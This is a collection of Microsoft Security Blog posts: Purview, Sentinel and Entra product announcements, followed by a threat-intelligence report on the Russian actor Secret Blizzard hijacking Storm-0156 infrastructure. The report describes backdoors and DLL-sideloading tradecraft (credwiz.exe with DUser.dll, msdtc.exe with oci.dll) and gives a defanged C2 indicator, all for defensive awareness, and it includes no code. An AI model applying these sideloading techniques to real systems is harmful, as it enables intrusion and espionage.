Learn moreMicrosoft Purview enables you to discover, secure, and govern data across Microsoft and third-party sources. Today, Microsoft Purview delivers rich data security capabilities through Microsoft Purview Data Loss Prevention, Microsoft Purview Information Protection, and Microsoft Purview Insider Risk Management, enhanced with AI-powered Adaptive Protection. To drive AI transformation, you need to build and maintain a strong data foundation, categorized by data that is not just secured but also governed. Microsoft Purview also addresses your data governance needs with the newly reimagined Microsoft Purview Unified Catalog. These data security and data governance products leverage shared capabilities such as a common data catalog, connectors, classifications, and audit logs—helping reduce inconsistencies, inefficiencies, and exposure gaps, commonly experienced by using disparate tools.
Introducing Microsoft Purview Data Security Posture ManagementMicrosoft Purview Data Security Posture Management (DSPM) provides visibility into data security risks and recommends controls to protect that data. DSPM provides contextual insights, usage analysis, and continuous risk assessments of your data, helping you mitigate risks and enhance data security. With DSPM, you get a shared understanding of key risks through a series of reports that correlate insights across location and type of sensitive data, risky user activities, and common exfiltration channels. In addition, DSPM provides actionable, scenario-based recommendations for detection and protection policies. For example, DSPM can help you create an Insider Risk Management policy that identifies risky behavior such as downgrading labels in documents followed by exfiltration, and a data loss prevention (DLP) policy to block that exfiltration at the same time.
DSPM also brings a view of historical trends and insights based on sensitivity labels applied, sensitive assets covered by at least one DLP policy, and potentially risky users so show the effectiveness of your data security policies over time. And finally, DSPM leverages the power of generative AI through its deep integration with Microsoft Security Copilot. With this integration, you can easily uncover risks that might not be immediately apparent and drive efficient and richer investigations—all in natural language.
With DSPM, you can easily identify possible labeling and policy gaps such as unlabeled content and users that aren’t scoped in a DLP policy, unusual patterns and activities that might indicate potential risks, as well as opportunities to adapt and strengthen your data security program.
Figure 1. DSPM overview page provides centralized visibility across data, users, and activities, as well as access to reports.
Learn more about this announcement in the Data Security Posture Management blog.
Increasing data security and security operations center integrationUnderstanding data and user context is vital for improving security operations and prioritizing investigations, especially when sensitive data is at stake. By integrating insights such as data classification, access controls, and user activity into the security operations center (SOC) experience, organizations can better assess the impact of security incidents, reduce false alerts, and enhance containment efforts. In addition to the already present DLP alerts in the Microsoft Defender XDR incident investigation and data security remediation actions enabled directly from Defender XDR, we’ve also added Insider Risk Management context to the user entity page to provide a more comprehensive view of user activities.
With Microsoft Purview’s latest integration with Microsoft Defender, now in preview, you get insider risk alerts in Defender XDR and can correlate them with incidents. This gives you critical user context for your security investigations. SOC teams can now better distinguish internal incidents from external cyberattacks and refine their response strategies. For more complex analysis to identify risks such as attack patterns, we are integrating insider risk signals into Defender XDR’s Advanced Hunting, giving you deeper insights and allowing you to improve your policies in partnership with data security teams. Together, these advancements allow your organization to stay ahead of evolving cyberthreats, providing a collaborative and data-driven approach to security.
Learn more about this announcement in the Purview Insider Risk Management blog.
Protecting data and preventing sensitive data lossAs AI generates new data in unprecedented volumes, the need to secure that data and prevent the loss of sensitive information has become even more crucial. Our new DLP capabilities help you effectively investigate DLP incidents, fortify existing protections, and refine your overall DLP program. You can now customize Purview DLP to the established processes of your organization with the Microsoft Power Automate connector in preview. This lets you automate and customize your DLP policy actions through Power Automate workflows to integrate your DLP incidents into new or established IT, security, and business operations workflows, like stakeholder awareness or incident remediation.
DLP policy insights in Security Copilot, also in preview, summarize existing DLP policies in natural language and helps you understand any gaps in policy coverage across your environment. This makes it easier for you to quickly and easily understand the full breadth of DLP policy coverage across your organization and address gaps in protection. We are also enhancing DLP protections on endpoints by expanding our file type coverage from more than 40 to more than 110 file types. Users can also now store and view full files on Windows devices as evidence for forensic investigations using Microsoft-managed storage. With the Microsoft-managed option, your admins can save time otherwise spent configuring additional settings, assigning permissions, and selecting the storage in the policy workflow. Finally, you can now enforce blanket protections on file types that cannot currently be scanned or classified by endpoint DLP, such as blocking copy to removable media for all computer-aided design (CAD) files regardless of those files’ contents. This helps ensure that the diverse range of file types found in your environment are still protected even if they cannot currently be scanned and classified by Microsoft Purview endpoint DLP.
Learn more about these announcements in our Microsoft Purview Data Loss Prevention blog.
Microsoft Purview Data Governance innovations to drive greater business valueResearch indicates that data practitioners spend 80% of their time finding, cleaning, and organizing data, leaving only 20% of time to process and analyze it.4 To simplify the data governance practice in the age of AI, the Microsoft Purview Unified Catalog is a comprehensive enterprise catalog that automatically inventories and tags your organization’s critical data assets. This gives your business users the ability to search for specific business data when building analytics reports or AI models. The Unified Catalog gives you visibility and confidence in your data across your disparate data sources and local catalogs with built-in data quality management and end-to-end lineage. You can integrate metadata from diverse catalogs such as Fabric OneLake, Databricks Unity, and Snowflake Polaris, into a unified catalog for all your data stewards, data owners, and business users.
Now in preview, Unified Catalog provides deeper data quality through a new scan engine that supports open standard file and table formats for big data platforms, including Microsoft Fabric, Databricks Unity Catalog, Snowflake, Google Big Query, and Amazon S3. This new scan engine enables rich data quality management at the asset level for improved data quality management at the asset level for overall improved data quality health. Lastly, Microsoft Purview Analytics in OneLake (preview) allows you to extract tenant-specific metadata from the Unified Catalog and export it directly into OneLake. You can then use Microsoft Power BI to analyze the metadata to further understand and report on your data’s quality and lineage.
Learn more about these announcements in our Microsoft Purview Data Governance blog.
Support compliance and regulatory requirementsMicrosoft compliance and Privacy solutions
Learn moreAs regulatory requirements evolve with the proliferation of AI, it is more critical than ever for businesses to keep compliance and privacy top of mind. However, adhering to requirements is becoming increasingly complex, while consequences for non-compliance are growing more severe. Microsoft Purview empowers you to address regulatory demands and comply with corporate policies by offering compliance and privacy controls that are both scalable and adaptable to changing needs.
New templates in Compliance Manager to help simplify complianceMicrosoft Purview Compliance Manager provides insights into your organization’s compliance status through compliance templates and provides suggested actions and next steps to help you along your compliance journey. Compliance Manager continues to add new templates to help you address new and evolving regulations, including templates for the European Union AI Act (EUAI Act), NIST 2 AI, ISO 42001, ISO 23894, Digital Operations Resiliency Act (DORA), and additional industry and regional regulations. Compliance Manager now includes historical records that help track your organization’s compliance and provides actionable next steps to understand how new regulations or policies affect your compliance score over time. In addition, you can now leverage custom templates to address both regulatory and your organization’s specific policies and preferences.
Figure 2. EUAI Act Assessment in Compliance Manager.
Learn more about this announcement in the Microsoft Purview Compliance Manager blog.
New Microsoft Purview controls for ChatGPT Enterprise with integration with OpenAI for improved complianceMicrosoft Purview now integrates with ChatGPT Enterprise, allowing you to gain visibility and govern the prompts and responses of your ChatGPT Enterprise interactions. This integration, currently in preview, includes Microsoft Purview Audit for auditing ChatGPT Enterprise interactions, Microsoft Purview Data Lifecycle Management for enabling retention and deletion policies, Microsoft Purview Communication Compliance to proactively detect regulatory and corporate policy violations, and Microsoft Purview eDiscovery to streamline legal investigations.
Learn more about all these announcements in our Security for AI blog.
Microsoft Purview is built to help safeguard AI InnovationWith the rapid adoption of AI, new vulnerabilities have emerged, highlighting the need for strong data security and governance of AI workloads. Microsoft Purview is built to secure and govern data related to pre-built and custom-built AI apps.
Introducing Microsoft Data Security Posture Management for AI (DSPM for AI)Security teams often find themselves in the dark when it comes to data security and compliance risks associated with AI usage. Without proper visibility, organizations often struggle to safeguard their AI assets effectively. DSPM for AI, now generally available, gives you visibility through a centralized dashboard and reports, enables you to proactively discover and manage your AI-related data risks, such as sensitive data in user prompts, and gives you actionable recommendations and real-time insights to respond effectively to security incidents.
Microsoft Purview controls for Microsoft 365 Copilot help prevent data oversharingData oversharing occurs when users have access to more data than necessary for their job duties. Organizations need effective data security controls to help mitigate this risk. At Microsoft Ignite we announced a number of new Microsoft Purview capabilities in preview to prevent data oversharing in Microsoft 365 Copilot.
Data oversharing assessments: Discover data that is at risk of oversharing by scanning files containing sensitive data, identifying risky data sources such as SharePoint sites with overly permissive user access, and by providing recommendations such as auto-labeling policies and default labels to prevent sensitive data from being overshared. The oversharing assessment report can identify unlabeled files accessed by users before deploying Copilot or can be run post-deployment to identify sensitive data referenced in Copilot responses.
Label-based permissions: Microsoft 365 Copilot honors permissions based on sensitivity labels assigned by Microsoft Purview when referencing sensitive documents.
Purview DLP for Microsoft 365 Copilot: You can create DLP policies to exclude documents with specified sensitivity labels from being processed, summarized, or used in responses in Microsoft 365 Copilot, preventing sensitive data from being inadvertently overshared.
New Microsoft Purview capabilities to detect risky activities in Microsoft 365 CopilotSecurity teams need ways to detect risky use of AI applications like deliberate or accidental access to sensitive data, jailbreaks, and copyright violations. Insider Risk Management and Communication Compliance now provide risky AI usage indicators, a policy template, and an analytics report in preview to help detect and investigate the risky use of AI. These new capabilities not only help detect risky activities and prompts but also integrate with Microsoft Defender XDR, enabling your security teams to investigate new AI-related risks holistically alongside other risks, such as identity risks through Microsoft Entra and data oversharing and data loss risks through Purview DLP.
New Microsoft Purview capabilities for agents built with Microsoft Copilot StudioWhen new and citizen developers are building low code or no-code AI, they often lack security expertise and tools to enable security and compliance controls. Microsoft Purview now provides data controls for agents built in Copilot Studio to enable low code and no-code developers to build more secure agents. For example, when an agent built with Copilot Studio accesses sensitive data, it will recognize and honor the sensitivity labels of the data being accessed. Microsoft Purview will also protect sensitive data generated by the agent through label inheritance and will enforce label permissions, ensuring only authorized users have access.
Data security admins also get visibility into the sensitivity of data in user prompts and agent responses within DSPM for AI. Moreover, Microsoft Purview will enable you to detect anomalous user activity and risky or non-compliant AI use and apply retention or deletion policies on your agent prompts and responses. These new controls give you visibility and and insights into risks for your agents built with Copilot Studio, strengthening your data security posture.
Learn more about all these announcements in our Security for AI blog.
Unified solutions that empower your organizationAs you navigate the complexities of AI proliferation, regulatory requirements, and security threats, we are excited to innovate, invest in, and expand the capabilities of Microsoft Purview to address your most pressing data security, governance, and compliance challenges.
Safeguard your data with a unified approach in Microsoft Purview Get started with Microsoft Purview todayTo get started, we invite you to try Microsoft Purview free and to learn more about Microsoft Purview today.
- Read the Data Security Index report.
- Read our new whitepaper: Accelerating AI transformation by prioritizing security, a path to implementing effective security for AI that enables innovation.
- Watch Microsoft Purview sessions from Microsoft Ignite.
- Try Microsoft Purview for free.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
1Microsoft internal research, May 2023.
2Gartner, Innovation Insight for Security Platforms, Peter Firstbrook, Craig Lawson. October 16, 2024. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.
3Microsoft internal research, August 2024.
4Overcoming the 80/20 Rule in Data Science, Pragmatic Institute.
The post New Microsoft Purview features help protect and govern your data in the era of AI appeared first on Microsoft Security Blog.
Why security leaders trust Microsoft Sentinel to modernize their SOC
Security information and event management (SIEM) solutions have long served as the indispensable nerve center for the security operations center (SOC). However, the SIEM landscape has undergone seismic shifts and market disruption in recent times, making it that much harder for chief information security officers (CISOs) to navigate and select the optimal SIEM for their needs.
Microsoft SentinelTransform SecOps with Microsoft Sentinel, powered by the cloud and AI.
Read the datasheetSeveral well-established, traditional SIEMs have been acquired by bigger vendors, raising uncertainty around their future product roadmap and long-term support commitments. Additionally, legacy on-premises SIEMs demand substantial infrastructure investments, require extensive configuration expertise, and constant maintenance—resulting in high operational costs and inefficiencies. Even more critically, traditional SIEMs often struggle to scale or adapt to the evolving cyberthreat landscape. Their rigid architecture and lack of flexibility leave organizations exposed to sophisticated, fast-changing threats.
In contrast, newer entrants to the SIEM market, typically founded in adjacent security markets, promise innovation but often lack maturity, proven reliability, and feature completeness. Their solutions can leave organizations grappling with gaps in coverage or integration challenges. Similarly, data lake providers have entered the scene with do-it-yourself security solutions that involve complex, multivendor integrations. While these may appeal to organizations seeking flexibility, they frequently demand high levels of customization and operational expertise—an approach yet to demonstrate consistent success.
Security operation centers require a modern SIEMAs cyberattacks continue to increase in frequency and sophistication, an effective and comprehensive SIEM has never been more important. Given the churn in the industry, Microsoft Sentinel stands out as an established leader in the category, delivering results and innovation year after year. So many CISOs are increasingly switching to Microsoft Sentinel to gain cloud flexibility and broad coverage to protect the entire digital ecosystem. In fact, today, more than 25,000 customers trust Microsoft Sentinel to help them stay ahead of even the most emergent cyberthreats, driving innovation with next generation AI and automation, strong threat intelligence, and robust, built-in capabilities. Learn more about why Microsoft Sentinel is the choice for security professionals.
Protect everything with a comprehensive SIEM solutionMicrosoft Sentinel’s robust, built-in capabilities are designed to secure your entire multicloud, multiplatform ecosystem. It integrates seamlessly with Microsoft 365, Microsoft Azure services, and a wide range of third-party applications, providing a unified view of your security landscape.
- Empower security teams with full-spectrum SIEM capabilities including security orchestration, automation, and response (SOAR), threat intelligence platform, generative AI, user and entity behavior analytics (UEBA), and native integration with extended detection and response (XDR).
- Secure your entire digital estate with more than 350 data collectors.
- Streamline the analyst experience with the unified security operations platform.
- Address a wide-range of scenarios with a library of out-of-the-box playbooks, dashboards, and detection rules, including more than 200 Microsoft-created solutions, more than 280 community contributions, and more than 21,000 GitHub commits.
Microsoft Sentinel empowers SOCs to proactively address cyberthreats with world-class AI and global threat intelligence. Its advanced models identify anomalies and sophisticated attacks that traditional SIEMs can miss. By leveraging continuous updates from Microsoft’s global threat intelligence feed, your SOC is better equipped to handle the evolving digital threat landscape.
- Achieve efficiency gains from the reduction of false positives by up to 79%.1
- Detect threats 50% faster with unified correlation engine across SIEM and XDR alerts.2
- Increase efficiency with automation playbooks.
- Gain actionable insights from threat intelligence powered by 78 trillion daily signals reasoned over with AI and 10,000 world-class security experts.
- Complete tasks 22% faster and accelerate mean time to resolution by 30% with Security Copilot embedded into the analyst workflow.2
As a cloud-native SIEM, Microsoft Sentinel eliminates the need for upfront infrastructure investments, enabling organizations to scale their security operations seamlessly with unparalleled flexibility to address evolving business needs. Security teams can achieve significant cost savings by leveraging dynamic SOC recommendations that optimize resource allocation, streamline processes, and enhance threat response efficiency, enabling organizations to maximize the value of their security investments.
- Composite organization experienced a return on investment of 234% over three years.1
- Expand coverage with a low-cost tier built for high volume logs (for example: network, firewall, and proxy).
- Dynamic, tailored recommendations to maximize security value and optimize costs.
- Simplify and accelerate implementation with migration tools.
Microsoft Sentinel is transforming how SOCs operate by offering a cloud-native, AI-powered solution that scales with your organization’s needs. Its comprehensive capabilities, from full-spectrum SIEM features to advanced AI and automation, help security teams detect, respond to, and mitigate cyberthreats faster and more effectively.
Whether you’re looking to eliminate the inefficiencies of legacy SIEM systems, simplify threat management, or scale cost effectively, Microsoft Sentinel provides a game-changing solution for the modern SOC.
Learn moreLearn more about Microsoft Sentinel, and read the Microsoft Sentinel datasheet.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
1Forrester Total Economic Impact™ of Microsoft Sentinel, A commissioned study conducted by Forrester Consulting, March 2024. Results are based on a composite organization representative of interviewed customers.
2Generative AI and Security Operations Center Productivity: Evidence from Live Operations, Microsoft study by James Bono, Alec Xu, Justin Grana. November 24, 2024.
The post Why security leaders trust Microsoft Sentinel to modernize their SOC appeared first on Microsoft Security Blog.
8 years as a Leader in the Gartner® Magic Quadrant™ for Access Management
In mid-October, we released our 2024 Microsoft Digital Defense Report, which revealed over 600 million identity attacks per day. As multifactor authentication now blocks most password-based attacks, we’re seeing a shift in threat actor tactics and a convergence of nation-state and cybercriminal threat activity. More than 99% of identity attacks are password attacks—often due to predictable human behaviors like easy-to-guess passwords, password reuse, and falling prey to phishing attacks.1 That’s why comprehensive, integrated identity and access management (IAM) should be a core part of any organization’s threat-informed defense. Today we’re honored to announce that for the eighth year in a row, Microsoft has been named a Leader in the 2024 Gartner® Magic Quadrant™ for Access Management—placed highest on the Ability to Execute axis.
Delivering on identity and access management for customersWe believe our 2024 Gartner® Magic Quadrant™ recognition validates our commitment to delivering a comprehensive, AI-powered and automated identity portfolio to customers, with Microsoft Entra. It empowers customers to protect their digital everything with a simplified user experience that makes identity and access management (IAM) easier than ever before. And it’s informed by our customers and partners—to whom we thank and share this honor.
Source: GartnerMicrosoft Entra is a unified identity and network access solution that protects any identity and secures access to any application or resource, in any cloud or on-premises. It’s a single place with a simplified user experience for security professionals. Microsoft Entra allows organizations to:
- Use adaptive identity and network access controls to secure access to any app or resource, from anywhere.
- Protect and verify every identity with consistent security policies for every user—employees, frontline workers, customers, and partners—as well as apps, devices, and workloads across multicloud and hybrid environments.
- Provide only the access necessary with right-size permissions, access lifecycle management, and least-privilege access for any identity.
We’re especially proud of this recognition in our eighth year recognized as a Leader, and share our thanks to our customers, partners, and team members for their contributions and support.
Secure access with Microsoft Entra Looking to the futureAs we celebrate this year’s recognition, we’re also hard at work on new and expanded features—looking ahead to meet customers’ changing IAM needs as our collective threat landscape continues to evolve.
Microsoft Entra ID currently supports device-bound passkeys stored on FIDO2 security keys and in Microsoft Authenticator. And we’re investing in both synced and device-bound passkeys for work accounts. For enterprises that use passwords today, passkeys provide a seamless way for workers to authenticate without entering a username or password. Passkeys provide improved productivity for workers and have better security. Read more about requirements and instructions to enable passkeys for your organization.
Microsoft Security Copilot
Learn moreMicrosoft Security Copilot, now in public preview, is embedded in Microsoft Entra—helping customers investigate and resolve identity risks, assess identities and access with AI-powered intelligence, and complete complex tasks quickly. Built on top of real-time machine learning, Copilot in Microsoft Entra can help your teams find gaps in access policies, generate identity workflows, and troubleshoot faster. You can also unlock new skills that allow admins at all levels to complete complex tasks such as incident investigation, sign-in log analysis, and more, to gain savings in time and resources. Read more about the key features of Copilot in Microsoft Entra.
Microsoft is working with a diverse community to create a decentralized identity solution that puts individuals in charge of their own digital identities, providing a secure and private way to manage identity data without relying on centralized authorities or intermediaries. With Face Check with Microsoft Entra Verified ID, enterprises can perform high-assurance verifications securely, simply, and at scale. Powered by Azure AI services, Face Check adds a critical layer of trust by performing facial matching between a user’s real-time selfie and a photo. Read more about the prerequisites and set up requirements for Face Check with Microsoft Entra Verified ID.
Learn moreYou can learn more by reading the full 2024 Gartner® Magic Quadrant™ for Access Management report. To learn more about the Microsoft Entra portfolio and its products, visit our website.
Are you a regular user of Microsoft Entra ID? Review your experience on Gartner Peer Insights™ and get a $25 gift card.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
1Microsoft Digital Defense Report, Microsoft. 2024.
This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft.
Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved.
Gartner, Magic Quadrant for Access Management, 2 December 2024, By Brian Guthrie, Nathan Harris, Abhyuday Data, Josh Murphy.
The post 8 years as a Leader in the Gartner® Magic Quadrant™ for Access Management appeared first on Microsoft Security Blog.
Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage
Based on both Microsoft Threat Intelligence’s findings and those reported by governments and other security vendors, we assess that the Russian nation-state actor tracked as Secret Blizzard has used the tools and infrastructure of at least six other threat actors during the past seven years. They also have actively targeted infrastructure where other threat actors have staged exfiltrated data from victims with the intention of collecting this data for their own espionage program. We assess that Secret Blizzard’s use of other actors’ infrastructure and tools, both state-sponsored and cybercriminal, is exclusively for facilitating espionage operations.
In this first of a two-part blog series, we discuss how Secret Blizzard has used the infrastructure of the Pakistan-based threat activity cluster we call Storm-0156 — which overlaps with the threat actor known as SideCopy, Transparent Tribe, and APT36 — to install backdoors and collect intelligence on targets of interest in South Asia. Microsoft Threat Intelligence partnered with Black Lotus Labs, the threat intelligence arm of Lumen Technologies, to confirm that Secret Blizzard command-and-control (C2) traffic emanated from Storm-0156 infrastructure, including infrastructure used by Storm-0156 to collate exfiltrated data from campaigns in Afghanistan and India. We thank the Black Lotus Team for recognizing the impact of this threat and collaborating on investigative efforts. In the second blog, Microsoft Threat Intelligence will be detailing how Secret Blizzard has used Amadey bots and the PowerShell backdoor of two other threat actors to deploy the Tavdig backdoor and then use that foothold to install their KazuarV2 backdoor on target devices in Ukraine.
Microsoft Threat Intelligence tracks Secret Blizzard campaigns and, when we are able, directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. As part of our continuous monitoring, analysis, and reporting on the threat landscape, we are sharing our research on Secret Blizzard’s activity to raise awareness of this threat actor’s tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity. In addition, we highlight that, while Secret Blizzard’s use of infrastructure and access by other threat actors is unusual, it is not unique. Therefore, organizations compromised by one threat actor may also find themselves compromised by another through the initial intrusion.
Who is Secret Blizzard?The United States Cybersecurity and Infrastructure Security Agency (CISA) has attributed Secret Blizzard to Center 16 of Russia’s Federal Security Service (FSB), which is one of Russia’s Signals Intelligence and Computer Network Operations (CNO) services responsible for intercepting and decrypting electronic data as well as the technical penetration of foreign intelligence targets. Secret Blizzard overlaps with the threat actor tracked by other security vendors as Turla, Waterbug, Venomous Bear, Snake, Turla Team, and Turla APT Group.
Secret Blizzard is known for targeting a wide array of verticals, but most prominently ministries of foreign affairs, embassies, government offices, defense departments, and defense-related companies worldwide. Secret Blizzard focuses on gaining long-term access to systems for intelligence collection using extensive resources such as multiple backdoors, including some with peer-to-peer functionality and C2 communication channels. During intrusions, the threat actor collects and exfiltrates documents, PDFs, and email content. In general, Secret Blizzard seeks out information of political importance with a particular interest in advanced research that might impact international political issues. Campaigns where Secret Blizzard has used the tools or compromised infrastructure of other threat adversaries that have been publicly reported by other security vendors include:
- Accessing tools and infrastructure of Iranian state-sponsored threat actor Hazel Sandstorm (also called OilRig, APT-34 and Crambus) in 2017, as reported by Symantec and the US and UK intelligence services
- Reusing Andromeda malware to deploy the KopiLuwak and QuietCanary backdoors in 2022, as reported by Mandiant.
- Using the backdoor of the Kazakhstan-based threat actor tracked by Microsoft Threat Intelligence as Storm-0473, also called Tomiris, in an attempt to deploy QuietCanary in 2022, as reported by Kaspersky.
While not unique, leveraging the access of other adversaries is a somewhat unusual attack vector for threat actors in general. Secret Blizzard’s use of this technique highlights their approach to diversifying attack vectors, including using strategic web compromises (watering holes) and adversary-in-the-middle (AiTM) campaigns likely facilitated via legally mandated intercept systems in Russia such as the “System for Operative Investigative Activities” (SORM). More commonly, Secret Blizzard uses server-side and edge device compromises as initial attack-vectors to facilitate further lateral movement within a network of interest.
Compromise and post-compromise activitiesSince November 2022, Microsoft Threat Intelligence has observed Secret Blizzard compromising the C2 infrastructure of a Pakistan-based espionage cluster that we track as Storm-0156. Secret Blizzard has used Storm-0156’s backdoors to deploy their own backdoors to compromised devices. In addition, Secret Blizzard tools have been deployed to virtual private servers (VPS) staging Storm-0156’s exfiltrated data.
The initial access mechanism used by Secret Blizzard to compromise Storm-0156 infrastructure is currently not known. In some instances, observed by Microsoft Threat Intelligence, Storm-0156 appeared to have used the C2 server for a considerable amount of time, while in other observed incidents Storm-0156 began accessing the VPS when Secret Blizzard deployed tools.
On the VPS used for C2, Storm-0156 operators consistently deploy a tool with the filename ArsenalV2%.exe. This is a server-side C2 tool that Microsoft Threat Intelligence refers to as Arsenal. Arsenal is an executable built on top of the cross-platform application development framework QtFramework, indicating it may also be deployed on operating systems other than Windows. Upon execution, Arsenal listens over a hardcoded port for incoming requests from controlled devices. Once connected, the tool enables threat actors to upload or download files to or from the device on which it is deployed.
When Arsenal is deployed, at least two SQLite3 databases, named ConnectionInfo.db and DownloadPriority.db, are set up. Arsenal uses these databases to store and look up information in different tables, such as:
- Uploaded files and a distinct username of the uploader
- Affected device information, including IP address, location, operating system version, and installed antivirus software
- Network connection events, duration of the session, and timestamps like the disconnect and connect time
Initially, Secret Blizzard deployed a fork of the TinyTurla backdoor to Storm-0156 C2 servers. However, since October 2023, Secret Blizzard predominantly has been using a .NET backdoor that Microsoft Threat Intelligence refers to as TwoDash alongside a clipboard monitoring tool referred to as Statuezy. Shortly after we observed the deployment of these capabilities, our partner Black Lotus Labs observed C2 communication from the Storm-0156 C2 infrastructure to dedicated Secret Blizzard C2s. This privileged position on Storm-0156 C2s has allowed Secret Blizzard to commandeer Storm-0156 backdoors such as CrimsonRAT, which was previously observed in Storm-0156 campaigns in 2023 and earlier, and a Storm-0156 Golang backdoor we refer to as Wainscot.
Storm-0156 extensively uses a renamed version (cridviz.exe, crezly.exe) of the Credential Backup and Restore Wizard, credwiz.exe which is vulnerable to DLL-sideloading, to load malicious payloads using a file name DUser.dll. Secret Blizzard often drops their own malicious payloads into a directory separate from that used by Storm-0156, but also uses credwiz.exe to load their malicious payload in a file called duser.dll. This DLL may contain a simple Meterpreter-like backdoor referred to as MiniPocket or the previously referenced TwoDash .NET backdoor. Secret Blizzard’s use of DLL-sideloading using the same legitimate executable and malicious payloads having similar names to those used by Storm-0156 may indicate Secret Blizzard attempts to masquerade as Storm-0156. Another Search-Order-Hijack used by Secret Blizzard is the deployment of TwoDash into the directory c:\windows\system32 with the filename oci.dll and then using the default Windows installation Distributed Transaction Coordinator, msdtc.exe, to DLL-sideload the malicious payload in oci.dll as described by a Penetration Testing Lab blog published in 2020.
Figure 1. Secret Blizzard and Storm-0156 chain of compromiseIn August 2024, Microsoft observed Secret Blizzard using a CrimsonRAT compromise that Storm-0156 had established in March 2024. Secret Blizzard is assessed to have commandeered the CrimsonRAT backdoor to download and execute Secret Blizzard’s TwoDash backdoor. Additionally, Microsoft observed instances of Secret Blizzard accessing Storm-0156’s CrimsonRAT on target devices in India. One of these CrimsonRAT deployments was configured with a C2 server at Contabo (ur253.duckdns[.]org: 45.14.194[.]253), where Secret Blizzard had deployed the clipboard monitor tool in January, February, and September 2024. Between May and August 2024, Black Lotus Labs confirmed network activity indicating backdoor communication from this same CrimsonRAT C2 to known Secret Blizzard infrastructure.
Secret Blizzard backdoors deployed on Storm-0156 infrastructure TinyTurla variantSimilar to the TinyTurla backdoor reported by Cisco Talos in 2021, the TinyTurla variant is installed using a batch file and disguises itself as a Windows-based service. The batch file also configures a variety of registry keys used by the malware including Delay (sleep time), Key (public key), and Hosts (C2 addresses).
Figure 2. mp.bat file containing configuring parameters for the TinyTurla variantWhile there is not complete feature parity between the TinyTurla variant sample and the sample analyzed by Cisco Talos, there are significant functional and code overlaps.
TwoDashTwoDash is a custom downloader comprised of two main components: a native Win32/64 PE file and a .NET application. The native binary acts as a loader for the .NET application which it decrypts and executes. The .NET application conducts a basic device survey and sends this information to the configured C2 servers. Finally, it waits for follow-on tasks, which are compiled as additional .NET assemblies/modules.
StatuezyStatuezy is a custom trojan that monitors and logs data saved to the Windows clipboard. Each time the clipboard is updated with new data, the trojan saves the current timestamp, associated clipboard format (such as CF_TEXT), and the clipboard data itself to a temporary file which we assess is exfiltrated by a separate malware family.
MiniPocketMiniPocket is a small custom downloader that connects to a hardcoded IP address/port using TCP to retrieve and execute a second-stage binary.
Storm-0156 backdoors used in this campaign WainscotWainscot is a Golang-based backdoor seen in the wild since at least October 2023. This backdoor can handle various commands from C2, including launching arbitrary commands, uploading and downloading files, and taking screenshots on the target host. Though Microsoft Threat Intelligence has primarily observed this backdoor targeting Windows users, we also have identified public reports of a possible Wainscot variant targeting Linux-based platforms. Interestingly, this Linux variant has far more features than the Windows variant.
CrimsonRATCrimsonRAT is a .NET-based backdoor with varied capabilities that has gone through multiple iterations over the years. The most recent variant of CrimsonRAT analyzed by Microsoft Threat Intelligence can gather system information, list running processes, file information, download or upload files, and execute arbitrary commands on target. We also have observed CrimsonRAT dropping additional modules to act as a keylogger on the target host.
Who has been affected by Secret Blizzard’s compromises using Storm-0156 infrastructure?In Afghanistan, Secret Blizzard generally has used their positions on Storm-0156 C2 servers to deploy backdoors to devices within the extended Afghan government—including the Ministry of Foreign Affairs, the General Directorate of Intelligence (GDI), and foreign consulates of the government of Afghanistan. In each of these cases, we observed the deployment of Storm-0156 backdoors which were subsequently used to download the Secret Blizzard tools to target devices in Afghanistan.
In India, Secret Blizzard generally appears to have avoided direct deployment via Storm-0156 backdoors, instead deploying Secret Blizzard backdoors to C2 servers or Storm-0156 servers hosting data exfiltrated from Indian military and defense-related institutions. We observed only one instance of Secret Blizzard using a Storm-0156 backdoor to deploy the TwoDash backdoor to a target desktop in India. The difference in Secret Blizzard’s approach in Afghanistan and India could reflect political considerations within the Russian leadership, differing geographical areas of responsibility within the FSB, or a collection gap on Microsoft Threat Intelligence’s part.
ConclusionThe frequency of Secret Blizzard’s operations to co-opt or commandeer the infrastructure or tools of other threat actors suggests that this is an intentional component of Secret Blizzard’s tactics and techniques. Leveraging this type of resource has both advantages and drawbacks. Taking advantage of the campaigns of others allows Secret Blizzard to establish footholds on networks of interest with relatively minimal effort. However, because these initial footholds are established on another threat actor’s targets of interest, the information obtained through this technique may not align entirely with Secret Blizzard’s collection priorities. In addition, if the threat actor that established the initial foothold has poor operational security, this technique might trigger endpoint or network security alerts on the tools deployed by the actor conducting the initial compromise, resulting in unintended exposure of Secret Blizzard activity.
Mitigation and protection guidanceTo harden networks against the Secret Blizzard activity listed above, defenders can implement the following:
Strengthen Microsoft Defender for Endpoint configuration- Microsoft Defender XDR customers can implement attack surface reduction rules to harden an environment against techniques used by threat actors
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Enable network protection in Microsoft Defender for Endpoint
- Ensure tamper protection is enabled in Microsoft Dender for Endpoint
- Run endpoint detection and response in block mode so that Microsoft Defender for Endpoint can block malicious artifacts even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode
- Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume
